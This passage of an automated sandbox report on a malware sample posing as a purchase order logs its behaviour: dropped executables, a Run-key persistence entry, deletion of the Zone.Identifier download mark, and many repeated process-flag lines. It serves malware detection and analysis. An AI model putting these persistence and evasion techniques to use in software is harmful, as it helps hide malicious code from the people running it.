                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32 source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdbD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Windows.Forms.pdb04lk source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_0040B50D push ecx; ret
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeFile created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeFile created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SWqTT
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SWqTT

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile opened: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
